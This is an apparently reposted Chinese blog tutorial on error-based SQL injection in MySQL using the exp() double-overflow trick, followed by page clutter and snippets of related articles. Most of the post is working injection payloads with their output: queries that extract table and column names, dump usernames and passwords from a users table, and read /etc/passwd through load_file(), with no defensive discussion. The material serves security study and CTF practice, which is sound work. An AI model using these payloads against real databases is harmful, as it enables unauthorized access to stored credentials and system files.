SQL注入 | exp()函数报错

最新推荐文章于 2024-05-21 20:44:45 发布
最新推荐文章于 2024-05-21 20:44:45 发布
阅读量6.1k 收藏 18
点赞数 1
分类专栏: Information Security 文章标签: exp()

0x01原理
当传递一个大于709的值时,函数exp()就会引起一个溢出错误。

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

MySQL中,exp与ln和log的功能相反,简单介绍下,就是log和ln都返回以e为底数的对数。

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
    
mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                    15 |
+-----------------------+
1 row in set (0.00 sec)

0x02注入
0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。

  mysql> select exp(~(select*from(select user())x));  
  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x03 注出数据
得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

检索数据:

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

0x04 读取文件
通过load_file()函数来读取文件

select exp(~(select*from(select load_file('/etc/passwd'))a));

归纳自:http://netsecurity.51cto.com/art/201508/489529.htm

JacobTsang
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql exp 报错_exp报错注入和updatexml报错注入
weixin_35895056的博客
02-26 482
前言做了实验吧一个题,由于过滤比较多,学了两种新接触的报错注入。一下为总结,以便复习,查看,也作为萌新间的分享交流吧。学习笔记 UpdateXml() MYSQL显错注入在学习之前,需要先了解 UpdateXml() 。UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,...
SQL 细节知识积累
★(ChengKing)【夜战鹰】【产品级性能调优与故障诊断分析】★
11-06 5036
Transact_sql:  TRUNCATE TABLE test   //用于删除test表中的数据  CREATE FUNCTION        //创建用户自定义函数  ALTER FUNCTION         //语句修改  DROP FUNCTION          //除去用户定义函数  CREATE UNIQUE CLUSTERED INDEX client_id ON c
MYSQL 通过exp()报错注入
Ciyaso的博客
01-16 3710
代码解释 exp()数学函数,用于计算e的x次方的函数。 约束条件 5.5<mysql版本<5.6 原理 exp是以e为底的指数函数, 但是,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。 将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。 我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。 从而实现了报错注入。
报错注入7大常用函数
最新发布
qq_64395221的博客
05-21 991
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集) GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。#获取users表里的段名。
第五十四章 SQL函数 EXP
yaoxin521123的博客
02-15 2074
文章目录第五十四章 SQL函数 EXP大纲参数描述示例 第五十四章 SQL函数 EXP 返回数字的指数(自然对数的倒数)的标量数值函数。 大纲 {fn EXP(expression)} 参数 expression - 对数指数,数值表达式。 EXP返回NUMERIC或DOUBLE数据类型。如果表达式的数据类型为DOUBLE,则EXP返回DOUBLE;否则返回NUMERIC。 描述 Exp是指数函数e n,其中e是常数2.718281828。因此,要返回e的值,可以指定{fn exp(1)}。Exp是自
使用exp进行SQL报错注入
weixin_34082695的博客
08-27 627
0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者...
SqlServer函数大全十九:EXP(指数)函数
yixiaobing的博客
03-09 583
在 SQL Server 中,EXP函数用于计算自然数 e 的指定次幂。e 是一个数学常数,其值约为 2.71828。EXP函数接受一个数值作为参数,并返回 e 的该数值次幂。
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
discuz的php防止sql注入函数
10-28
最早开始学习php的时候根本没考虑过安全方面的问题,那时候就是想能做出功能就是万岁了。随着做项目的时间慢慢加长,越来越感觉到网站安全方面的问题十分重要。
php中addslashes函数与sql防注入
10-25
主要介绍了php中addslashes函数与sql防注入,实例讲述了采用addslashes函数对于sql防注入的用处,对于PHP安全程序设计来说具有不错的参考借鉴价值,需要的朋友可以参考下
计算机中exp函数,特征日志和exp函数类型转换错误(Eigen log and exp functions type casting error)...
weixin_39718890的博客
07-28 234
I am working with Eigen in order to obtain the exponential and the logarithm of a matrix. I do not understand why the following code gives me a compilation error. The code is:Eigen::Matrix4d speedT = ...
exp:sql 工作总结
阿城的博客
08-01 761
不要用OR ,用 in
mysql exp函数_五、MySQL函数
weixin_29119033的博客
01-27 592
函数表示对输入参数值返回一个具有特定关系的值MySQL提供大量丰富的函数在进行数据库管理以及数据的查询和操作时将会经常用到各种函数。通过对数据的处理数据库功能可以变得更加强大更加灵活地满足不同需求。各类函数从功能主要分为以下几类数学函数、字符串函数、日期和时间函数、条件判断函数、系统信息函数和加密函数。5.1、数学函数绝对值函数ABS(x)mysql>SELECTABS(2),ABS(-...
exp()函数
weixin_43597743的博客
07-18 626
代码示例如下 #include<iostream> using namespace std; int main() { double s(double); double x, sinh; cout << "please input x:"; cin >> x; sinh = (s(x) - s(-x)) / 2; cout << "sin...
简单的sql注入之3 exp函数的使用
沐目的博客
05-08 1478
bugku – 简单的sql注入之3 用 1‘试了试,报错,让后1“回显正常。应该是单引号。既然报错,就试了试updatexml()这个函数,但发现被过滤了,所以用exp()这个函数,这里附上一些常见的报错函数:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html 给出payload: 表名: ?id=1' and exp(~(selec...
exp时,ORA-00932: 数据类型不一致解决方法
conghaike9413的博客
10-27 819
现象: EXP-00056: 遇到 ORACLE 错误 932 ORA-00932: 数据类型不一致: 应为 BLOB, CLOB, 但却获得 CHAR EXP-00000: 导出终止失败 解决方法:...
mysql exp_(转载)使用exp进行SQL报错注入
weixin_35172689的博客
01-18 855
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时...
mysql注入原理_Mysql报错注入原理分析
weixin_33756596的博客
01-19 431
报错类型Duplicate entry报错:多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息。Xpath报错:从mysql5.1.5开始提供两个XML查询和修改的函数,语法错误导致查询结果出现在报错信息里数据溢出报错:整形溢出,双精度溢出数据重复报错:列名重复其余报错(几何函数)基于count(),rand(),group by()的报错注入原理分析[转]利用Duplicate...
sql中窗口函数报错怎么办
04-07
在SQL中,窗口函数是一种强大的功能,可以对查询结果进行分组、排序和聚合操作。然而,有时候在使用窗口函数时可能会遇到一些错误。以下是一些常见的窗口函数错误及其解决方法: 1. "窗口函数不在GROUP BY子句中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值